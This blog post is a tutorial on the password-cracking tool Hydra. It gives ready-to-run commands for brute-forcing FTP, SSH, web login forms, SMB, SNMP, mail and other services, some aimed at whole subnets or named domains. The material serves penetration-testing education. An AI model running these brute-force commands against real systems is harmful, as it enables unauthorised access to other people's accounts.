Open in app

Sign in

Write

Sign in

Gaurav Davre
5 min readDec 16, 2022

### 003 mastering

What is Hydra?

Very Basic Introduction With ***

Hydra is a brute force online password cracking program;

We can use Hydra to run through a list and ‘bruteforce’ some authentication service. Imagine trying to manually guess someones password on a particular service (SSH, Web Application Form, FTP or SNMP) — we can use Hydra to run through a password list and speed this process up for us, determining the correct password.

Hydra has the ability to bruteforce the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

100 million password lists exist containing common passwords, so when an out-of-the-box application uses an easy password to login, make sure to change it from the default! Often CCTV camera’s and web frameworks use admin:password as the default password, which is obviously not strong enough.

Installing Hydra

If you’re using Kali Linux, hydra is pre-installed. Otherwise you can download it here: https://github.com/vanhauser-thc/thc-hydra

Hydra Commands

The options we pass into Hydra depends on which service (protocol) we’re attacking. For example if we wanted to bruteforce FTP with the username being user and a password list being passlist.txt, we’d use the following command:

hydra -l user -P passlist.txt ftp://MACHINE_IP

SSH

hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh

Post Web Form

We can use Hydra to bruteforce web forms too, you will have to make sure you know which type of request its making — a GET or POST methods are normally used. You can use your browsers network tab (in developer tools) to see the request types, or simply view the source code.

Below is an example Hydra command to brute force a POST login form:

hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

Common & Basic Modules

- rdp

Module rdp is optionally taking the windows domain name.

For example:

hydra rdp://192.168.0.1/firstdomainname -l john -p doe

- s7–300

Module S7–300 is for a special Siemens PLC. It either requires only a password or no authentication, so just use the -p or -P option.

- smb

Module smb default value is set to test both local and domain account, using a simple password with NTLM dialect.

Note: you can set the group type using LOCAL or DOMAIN keyword or other_domain:{value} to specify a trusted domain.

You can set the password type using HASH or MACHINE keyword (to use the Machine’s NetBIOS name as the password).

You can set the dialect using NTLMV2, NTLM, LMV2, LM keyword.

Example:

hydra smb://microsoft.com -l admin -p tooeasy -m "local lmv2"

hydra smb://microsoft.com -l admin -p D5731CFC6C2A069C21FD0D49CAEBC9EA:2126EE7712D37E265FD63F2C84D2B13D::: -m "local hash"

hydra smb://microsoft.com -l admin -p tooeasy -m "other_domain:SECONDDOMAIN"

- smtp, smtps

Module smtp is optionally taking one authentication type of: LOGIN (default), PLAIN, CRAM-MD5, DIGEST-MD5, NTLM

Additionally TLS encryption via STARTTLS can be enforced with the TLS option.

Example: smtp://target/TLS:PLAIN

- smtp-enum

Module smtp-enum is optionally taking one SMTP command of: VRFY (default), EXPN, RCPT (which will connect using “root” account) login parameter is used as username and password parameter as the domain name

For example to test if john@localhost exists on 192.168.0.1:

hydra smtp-enum://192.168.0.1/vrfy -l john -p localhost

- snmp

Module snmp is optionally taking the following parameters:

READ perform read requests (default)

WRITE perform write requests

1 use SNMP version 1 (default)

2 use SNMP version 2

3 use SNMP version 3

Note that SNMP version 3 usually uses both login and passwords!

SNMP version 3 has the following optional sub parameters:

MD5 use MD5 authentication (default)

SHA use SHA authentication

DES use DES encryption

AES use AES encryption

if no -p/-P parameter is given, SNMPv3 noauth is performed, which

only requires a password (or username) not both.

To combine the options, use colons (“:”), e.g.:

hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ target.com snmp

hydra -P pass.txt -m 2 target.com snmp

- sshkey

Module sshkey does not provide additional options, although the semantic for options -p and -P is changed:

  • -p expects a path to an unencrypted private key in PEM format.
  • -P expects a filename containing a list of path to some unencrypted private keys in PEM format.
  • svn

Module svn is optionally taking the repository name to attack, default is “trunk”

- telnet, telnets

Module telnet is optionally taking the string which is displayed after a successful login (case insensitive), use if the default in the telnet module produces too many false positives

- xmpp

Module xmpp is optionally taking one authentication type of: LOGIN (default), PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1

Note, the target passed should be a fdqn as the value is used in the Jabber init request, example: hermes.jabber.org

Hydra Usage

Attempt to login as the user (-l user) using a password list (-P passlist.txt) on the given FTP server (ftp://192.168.0.1):

hydra -l user -P passlist.txt ftp://192.168.0.1

Attempt to login on the given SSH servers (ssh) from the list (-M targets.txt) using a user list (-L logins.txt) and password list (-P pws.txt):

hydra -L logins.txt -P pws.txt -M targets.txt ssh

Attempt to login on the given FTP servers on the given subnet (ftp://[192.168.0.0/24]/) as the user admin (-l admin) and the password password (-p password):

hydra -l admin -p password ftp://[192.168.0.0/24]/

Attempt to login on the given mail server (imap://192.168.0.1/), using IMAP protocol with a user list (-L userlist.txt) and the password defaultpw (-p defaultpw), taking the authentication type PLAIN:

hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

Attempt to login on the given mail server using POP3S on the given IPv6 (-6) address 2001:db8::1, on port 143 using the credential list “login:password” from the defaults.txt file (-C defaults.txt) taking the authentication type DIGEST-MD5 and enforced TLS encryption via STLS (TLS).

hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

Hydra
Hacking Tools
Password Security
Brute Force
Brute Force Attack
Gaurav Davre

Written by Gaurav Davre

29 Followers

Cybersecurity enthusiast, always welcome to challenges.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams